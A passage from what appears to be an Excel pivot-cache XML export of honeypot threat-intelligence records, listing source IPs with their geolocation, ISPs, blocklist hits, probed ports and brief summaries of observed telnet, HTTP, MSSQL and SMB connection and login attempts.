    <s v="{'singular.ttk.pte.hu': ['unknown']}"/>
    <n v="36"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL: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7a75:3b9a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3645"/>
    <x v="3645"/>
    <s v="NA&amp;&amp;220-134-58-103.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T00:22:06"/>
    <d v="2023-10-08T07:57:00"/>
    <d v="2025-04-02T00:22:06"/>
    <n v="206"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H7&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;52682&amp;&amp;23&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:3a67"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3646"/>
    <x v="3646"/>
    <s v="59-126-61-136.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T00:14:46"/>
    <d v="2023-10-06T12:04:00"/>
    <d v="2025-04-02T00:14:46"/>
    <n v="13043"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;31978&amp;&amp;23&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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3b7e:3d88"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3647"/>
    <x v="3647"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T00:11:12"/>
    <d v="2024-11-27T04:40:09"/>
    <d v="2025-04-02T00:11:12"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H24"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f5:6e2e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3648"/>
    <x v="3648"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T00:06:08"/>
    <d v="2025-03-20T16:15:34"/>
    <d v="2025-04-02T00:06:08"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="TN"/>
    <s v="Tennessee"/>
    <s v="Knox"/>
    <s v="Knoxville"/>
    <s v="4634946"/>
    <s v="37929"/>
    <s v="35.9606"/>
    <s v="-83.9207"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4719:e183"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3649"/>
    <x v="3649"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T00:01:28"/>
    <d v="2025-04-02T00:01:28"/>
    <d v="2025-04-02T00:01:28"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:7975"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3650"/>
    <x v="3650"/>
    <s v="122-117-18-135.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T23:59:07"/>
    <d v="2024-04-04T08:55:00"/>
    <d v="2025-04-01T23:59:07"/>
    <n v="257"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;47891&amp;&amp;64279&amp;&amp;23&amp;&amp;80&amp;&amp;58223&amp;&amp;58235&amp;&amp;58238&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL: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7a75:1287"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3651"/>
    <x v="3651"/>
    <s v="125-229-31-216.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T23:57:51"/>
    <d v="2023-11-19T05:46:43"/>
    <d v="2025-04-01T23:57:51"/>
    <n v="4661"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;10714&amp;&amp;80&amp;&amp;23&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de5:1fd8"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3652"/>
    <x v="3652"/>
    <s v="59-126-78-147.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T23:51:58"/>
    <d v="2024-04-06T09:44:00"/>
    <d v="2025-04-01T23:51:58"/>
    <n v="307"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="31919&amp;&amp;80&amp;&amp;23&amp;&amp;25151&amp;&amp;42529"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:4e93"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3653"/>
    <x v="3653"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T23:44:11"/>
    <d v="2025-04-01T23:44:11"/>
    <d v="2025-04-01T23:44:11"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Jaipur"/>
    <s v="Jaipur"/>
    <s v="1269515"/>
    <s v="302003"/>
    <s v="26.9124"/>
    <s v="75.7873"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f5:c3c6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3654"/>
    <x v="3654"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T23:43:28"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T23:43:28"/>
    <n v="155"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_DNS_H28&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;1433&amp;&amp;53&amp;&amp;60582&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="26"/>
    <s v="Ivano-Frankivsk"/>
    <s v="Ivano-Frankivsk Raion"/>
    <s v="Ivano-Frankivsk"/>
    <s v="707471"/>
    <s v="NA"/>
    <s v="48.9226"/>
    <s v="24.711100000000002"/>
    <s v="35004"/>
    <s v="Branch Enterprise Netgroup-Service"/>
    <s v="Branch Enterprise Netgroup-Service"/>
    <s v="business"/>
    <s v="Branch Enterprise Netgroup-Service"/>
    <s v="2010-04-08"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51099)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51280)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,53171)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,53328)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,53827)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,53979)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51539)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51619)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,65403)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,65500)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,62645)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,62723)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51399)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51016)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (195.162.82.141,51239)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c3a2:528d"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3655"/>
    <x v="3655"/>
    <s v="1-34-254-21.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T23:40:36"/>
    <d v="2024-09-10T11:26:00"/>
    <d v="2025-04-01T23:40:36"/>
    <n v="406"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s 